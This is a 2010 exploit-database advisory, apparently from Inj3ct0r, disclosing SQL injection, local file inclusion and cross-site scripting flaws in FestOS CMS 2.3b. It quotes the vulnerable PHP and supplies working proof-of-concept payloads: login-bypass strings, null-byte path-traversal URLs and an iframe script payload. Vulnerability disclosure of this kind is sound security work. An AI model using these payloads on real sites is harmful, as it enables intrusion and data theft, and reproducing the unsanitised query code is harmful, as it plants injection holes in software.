[webapps / 0day] - FestOS CMS 2.3b Multiple Remote Vulnerabi
Posted on 08 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>FestOS CMS 2.3b Multiple Remote Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=============================================== FestOS CMS 2.3b Multiple Remote Vulnerabilities =============================================== Title : FestOS CMS 2.3b Multiple Remote Vulnerabilities Affected Version : <=2.3b Vendor Site : http://festengine.org/ Discovery : abysssec.com Description : This CMS have many critical vulnerability that we refere to some of those here: Vulnerabilites : 1- SQL Injection Vulnerability : 1.1- in admin/do_login.php line 17: // Process the login $query = "SELECT userid, roleID, username FROM ".$config['dbprefix']."users WHERE LCASE(username) = '".strtolower($_POST['username'])."' and password ='".md5($_POST['password'])."'"; $res = $festos->query($query); poc: in admin.php page: username: admin' or '1'='1 password: admin' or '1'='1 1.2- in festos_z_dologin.php: $query = "SELECT vendorID FROM ".$config['dbprefix']."vendors WHERE LCASE(email) = '".strtolower($_POST['email'])."' and password ='".$_POST['password']."'"; poc: in applications.php page: email: anything pass: a' or 1=1/* 2- Local File Inclusion (lfi): Vulnerability in index.php: line 41: if(isset($_GET['theme']) && !empty($_GET['theme']) && file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) { ... require_once($themepath.'/includes/header.php'); poc: http://localhost/festos/index.php?theme=../admin/css/admin.css%00 http://localhost/festos/artists.php?theme=../admin/css/admin.css%00 http://localhost/festos/contacts.php?theme=../admin/css/admin.css%00 http://localhost/festos/applications.php?theme=../admin/css/admin.css%00 http://localhost/festos/entertainers.php?theme=../admin/css/admin.css%00 http://localhost/festos/exhibitors.php?theme=../admin/css/admin.css%00 http://localhost/festos/foodvendors.php?theme=../admin/css/admin.css%00 http://localhost/festos/performanceschedule.php?theme=../admin/css/admin.css%00 http://localhost/festos/sponsors.php?theme=../admin/css/admin.css%00 http://localhost/festos/winners.php?theme=../admin/css/admin.css%00 3- Cross Site Scripting: in foodvendors.php, festos_foodvendors.php page has been included. lines 31-36. switch($switcher) { case 'details': if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') { $template = 'foodvendors_nonespecified.tpl'; break; } and in line 74: $tpl->set('vType', $_GET['category']); and foodvendors_nonespecified.tpl line 123: <p>Back to the list of <a href="<?php echo $_SERVER['PHP_SELF'];?>?view=list&vTypeID=<?php echo $vTypeID;?>" title="<?php echo $vType;?> Category">exhibitors in the <?php echo $vType;?> category</a>.</p> the category parameter is vulnerable to xss: poc: http://localhost/festos/foodvendors.php?view=details&vendorID=4&category=%3Ciframe%20src=javascript:alert%28%22XSS%22%29;&vTypeID=28 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-08]</pre></body></html>
